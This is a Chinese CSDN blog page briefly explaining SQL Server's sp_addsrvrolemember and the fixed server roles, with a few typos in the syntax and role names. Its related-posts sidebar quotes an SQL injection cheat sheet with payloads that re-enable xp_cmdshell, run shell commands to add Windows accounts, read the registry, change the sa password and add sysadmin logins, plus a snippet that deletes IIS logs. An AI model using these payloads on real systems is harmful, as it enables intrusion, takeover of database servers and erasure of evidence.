SQL数据库sp_addsrvrolemember 登入用户权限赋予说明

最新推荐文章于 2023-07-10 23:51:00 发布
最新推荐文章于 2023-07-10 23:51:00 发布
阅读量434 收藏 1
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lovemelovefish/article/details/129494105
版权

1.权限赋予语句

sp_addsrvrolemember 是 SQL Server 中的一个系统存储过程,用于将特定的数据库角色添加到登录

执行语句可以用:EXEC sp addsrvrolemember ‘账户’,‘权限’

范例:EXEC sp addsrvrolemember ‘USER01’,‘sysadmin’

2.权限说明

1bulk admin执行 BULK INSERT 语句
2dbcreator创建、修改、删除和还原数据库
3diskadmin管理磁盘文件
4pmcessadmin管理在 SOL Server 实例中运行的进程
5securityadmin管理服务器登录账户
6serveradmin配置服务器范围的设置
7setupadmin添加和删除链接服务器
8sysadmin在 SOL Server 中进行任何活动,该角色的权限跨越所有其它固定服务器角色
迪丽热爱
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库的安全管理.doc
02-27
实验9 数据库的安全管理 一、 实验目的 1、 掌握SQL Serve 的安全机制。 2、 掌握服务器的安全性管理。 3、 掌握数据库用户管理。 4、 掌握权限的管理。 二、 1、 使用企业管理器注册向导注册一个SQL Server服务器,选择"Windows身份验证模式"注册。如果已完成注册操作,先删除当前S QL Serve注册项,再重新注册。 2. 在企业管理器中通过SQL Server服务器属性对话框对SQL Server服务器进行混合认证模式配置。 3. 在Windows中创建用户账户,命名为"st_学号",如st_10。使用企业管理器为该用户创 建一个用于SQL Serve的登录账户,使用Windows身份认证,服务器角色为system administrators,授权可访问的studentsdb数据库,及数据库中的访问角色为publ ic和bdo。 4、 使用系统存储过程sp_grantlogin为实验内容3创建的Windows用户授权,使其具有登 录SQL Server的权限 sp_grantlogin 'stu51\st_41' 5、 使用系统存储过程sp_addlogin创建混合模式验证的SQL Server登录,指定用户名为"st_学号"(不必在Windows中建立该用户,下面以st_1 1为例),密码为学号,默认数据库为studentsdb。 sp_addlogin 'st_41','1007514241','studentsdb' 6、 使用企业管理器或系统存储过程sp_grantbaccess为登录账户st_11建立数据库用户 账户,指定用户名为st_user。 sp_grantdbaccess 'stu51\st_41','st_user' 7、 使用企业管理器或系统存储过程sp_addsrvrolemember将登陆账户st_11添加为固定 服务器角色sysadmin,使st_11所拥有的所有权限。 sp_addsrvrolemember 'stu51\st_41','sysadmin' 8、 使用企业管理器或系统存储过程sp_addrole为studentsdb数据库创建自定义数据库 角色student,并使student具有INSERT、DELETE、UPDATE对象权限和CREATE TABLE 语句权限。 sp_addrole 'student','INSERT、DELETE、UPDATE', ' CREATE TABLE ' grant 'INSERT、DELETE、UPDATE'on student 9、 使用企业管理器或系统存储过程sp_addrolemember将st_user添加为数据库角色stu dent成员,使它具有student的所有权限。 sp_addrolemember 'student', 'st_user' 10、 使用企业管理器或系统存储过程sp_helprotect查看表student_info所具有的权限。 sp_helprotect 11、 分别在studentsdb数据库的grade表和student_info表中进行插入/删除记录的操作 ,查看操作结果是否具有相应的权限 delete student_info where 学号='0001' 12、 使用企业管理器或系统存储过程sp_revikedbaccess从当前studentsdb数据库中删除 用户账户st_user。 sp_revokedbaccess st_user 13、 使用系统存储过程sp_defualtdb修改SQL Server登录账户st_11的默认数据库为master。 sp_defaultdb 'st_11','master' 14、 使用企业管理器或系统存储过程sp_droplogin删除SQL Server登录账户st_11。 sp_droplogin st_11 四、 实验思考 1、 使用系统存储过程查看固定服务器角色和固定数据库角色。说明固定服务器角色 和固定数据库角色有各什么数据库管理权限? 固定数据库角色是在每个数据库中都存在的预定义组。管理员可以将一个用户加入到一 个或多个数据库角色中。固定数据库角色不能被添加、修改或删除。 2、 Master数据库中的guest用户能否被删除,为什么? 不能。GUEST用户是一个您能加入到数据库并允许具有有效SQL Server登录的任何人访问数据库的一个特殊用户,以GUEST帐号访问数据库的用户被认为 是GUEST用户的身份并且继承GUEST帐号的所有权限和许可。 ----------------------- 数据库的安全管理全文共9页,当前为第1页。 数据库的安全管理全文共9页,当前为第2页。 数据库的安全管理全文共9页
冰舞2.6 ASP网站漏洞扫描工具
09-21
常用的一些命令: 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 数字类型 and char(124)%2Buser%2Bchar(124)=0 字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''=' 搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 爆用户名 and user>0 ' and user>0 and ''=' 检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 检测是不是MSSQL数据库 and exists (select * from sysobjects);-- 检测是否支持多行 ;declare @d int;-- 恢复 xp_cmdshell ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') //----------------------- // 执行命令 //----------------------- 首先开启沙盘模式: exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 然后利用jet.oledb执行系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 执行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 判断xp_cmdshell扩展存储过程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 写注册表 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 REG_SZ 读注册表 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 读取目录内容 exec master..xp_dirtree 'c:\winnt\system32\',1,1 数据库备份 backup database pubs to disk = 'c:\123.bak' //爆出长度 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 更改sa口令方法:用sql综合利用工具连接后,执行命令: exec sp_password NULL,'新密码','sa' 添加和删除一个SA权限的用户test: exec master.dbo.sp_addlogin test,ptlove exec master.dbo.sp_addsrvrolemember test,sysadmin
MSSQL内置数据库角色及访问权限设置
最新发布
book_dw5189的博客
07-10 1713
MSSQL内置数据库角色及访问权限设置
SQL Server 创建登录账号、创建用户名并为数据库赋予db_owner权限
weixin_45467975的博客
03-31 2191
SQL Server 创建登录账号、创建用户名并为数据库赋予db_owner权限
sql injection 终极利用方法
得峰的专栏 [网络收藏]
05-23 1125
呵``对于黑站``本人`也常使用到这个办法`没想到`给写的这么系统出来了``别问什么是技术``这就是技术了```` ` sql injection终极利用方法 ————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 原创:许文强(xwq),QQ:57133683 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减
SqlServer2008基础知识:安全与权限
weixin_30566063的博客
04-19 286
这两天在调用Microsoft.SqlServer.SMO.dll组件 《add login,create,backup,restore database to Sql Server using SMO》,接触到一些数据库的名词定义:登录名,用户,角色,架构,权限,部分新人对几个名词的概念不是很清晰 所以参考部分文档,摘录如下(权当温故⑧^_^): SqlServer2008的安全机制分为四个...
MS SQL Server命令行添加用户
benjoyeh的专栏
02-10 6827
命令行添加用户(SQL 2000及2008可用): sp_addlogin   '登录名','密码'; go sp_adduser '登录名','用户名','db_owner'(组名); go sp_addsrvrolemember '用户名','sysadmin' (角色名); go -------------------------------------------------
SQL 用户管理和授权
m0_62428181的博客
11-23 7234
MySQL数据库管理系统是一个多用户数据库,具有功能强大的访问控制系统,可以为不同用户指定不同权限。默认情况下使用root用户,该用户是超级管理员,拥有所有权限,包括创建用户、删除用户和修改用户密码等管理权限。 在实际应用中,为了满足实际项目的需求,可以创建拥有不同权限的普通用户。MySQL在安装时会自动创建一个名为“mysql”的数据库,其中存储的都是用户权限表。用户登录以后,MySQL数据库管理系统会根据这些权限表的内容为每个用户赋予相应的权限。
SQLserver 2008r2 本地sa密码忘记
jacobzhuo的博客
05-13 9629
问题:本地local 登录名sa密码忘记 解决步骤: 1、管理员身份进入cmd,执行 net stop mssqlserver; 2、执行"C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlserver.exe" /m/f 3、不要关闭上图命令窗口,重新以管理员身份运行一个cmd窗口,执行sqlcm...
Microsoft SQL Server 安全与权限
weixin_30815469的博客
05-15 914
Microsoft SQL Server 安全与权限 登陆角色 计算机操作系统用户 --创建Windows身份验证用户 USE [master] GO CREATE LOGIN [计算机名称\计算机用户名称] FROM WINDOWS WITH DEFAULT_DATABASE=[数据库名称], DEFAULT_LANGUAGE=[简体中文] GO --添加为d...
SQL SERVER中权限的设置
ice_dynasty的专栏
05-25 1019
use master --创建SQLSERVER身份验证登录exec sp_addlogin login1,123exec sp_addlogin login2,123use xscj  --将登录加入数据库成为数据库用户exec sp_adduser login1,user1exec sp_adduser login2,user2exec sp_addrole
sqlserver中 数据库角色解释
杨泽数据库学习园
08-20 3234
  角色当几个用户需要在某个特定的数据库中执行类似的动作时(这里没有相应的Windows用户组),就可以向该数据库中添加一个角色(role)。数据库角色指定了可以访问相同数据库对象的一组数据库用户。数据库角色的成员可以分为如下几类:Windows用户组或用户账户SQL Server登录其他角色SQL Server的安全体系结构中包括了几个含有特定隐含权限的角色。除了数据库
SQL Server创建用户并且为用户授权
qq_44544908的博客
09-20 9528
进入【用户映射】在右侧的面板中勾选该账号可以进行管理操作的数据库名称!并在该面板下面的【数据库角色成员身份】中勾选db_owner项!注意:如果给你个无系统管理权限的账号指定管理一个数据库时,则一定要勾选db_owner项!否则该账号无法看到该数据库中的任何数据表!进入【服务器角色】在右侧的服务器角色面板中,勾选public。右键点击登录名→新建登录名。
SQL Server 存储过程提权方法
PaidaxingSec的博客
02-08 850
SQL Server 存储过程提权方法
数据库查询语句
weixin_45065754的博客
06-03 815
SQL:Structured Query Language 结构化查询语言 建立数据库:create datebase 数据库名 使用数据库:use 数据库名 删除数据库:drop database 数据库名 建立表:(举例) create table student( 学号 char(3) not null, 姓名 nchar(3) not null, 性别 nchar(1) not null,...
SQL下三种执行CMD命令的方法
热门推荐
t134679的专栏
01-11 2万+
 SQL下三种执行CMD命令的方法:先删除7.18号日志:(1)exec master.dbo.xp_cmdshell del C:/winnt/system32/logfiles/W3SVC5/ex050718.log >c:/temp.txt(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT
sqlserver常用函数/存储过程/数据库角色
LuckyPeter的专栏
05-16 727
/*日期函数*/DATEADD ( datepart , number, date ) --在向指定日期加上一段时间的基础上,返回新的 datetime 值。DATEDIFF ( datepart , startdate , enddate ) --返回跨两个指定日期的日期和时间边界数。DATENAME ( datepart , date )--返回代表指定日期的指定日期部分的字符串。DATEPA
创建登录名用户名赋予服务器角色数据库角色语句
A_LiDan的博客
04-03 4064
--1. 删除测试用户EXEC sp_revokedbaccess N'U_dbCreator'   --移除用户对对其他用户建的数据库的访问权限,但是不能移除sa的访问权 --EXEC sp_droplogin N'U_dbCreator'        --删除登录用户 --2、创建登录名socct,A1-123EXEC sp_addlogin 'U_dbCreator1',...
如何在不提升用户权限的情况下,使普通用户执行sp_OACreate存储过程
zjcxc(邹建)的Blog - SQL Server
09-16 1万+
环境需求:SQL Server 2005 及之后的版本 背景在论坛上遇到一个问题,询问如何使用一个普通用户调用一个存储过程,这个存储过程使用了sp_OACreate这一系列存储过程来执行一些非常规的任务。当然,前提是普通用户只有调用这个存储过程的时候才能获得执行sp_OACreate的权限。最初的时候也没有仔细考虑,心想,sp_OACreate需要具有sysadmin固定服务器角色
sqlserver 权限常用语句
06-01
以下是 SQL Server 常用的权限相关语句: 1. 创建数据库用户并授权: ``` CREATE LOGIN [username] WITH PASSWORD = 'password'; USE [database_name]; CREATE USER [username] FOR LOGIN [username]; GRANT ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值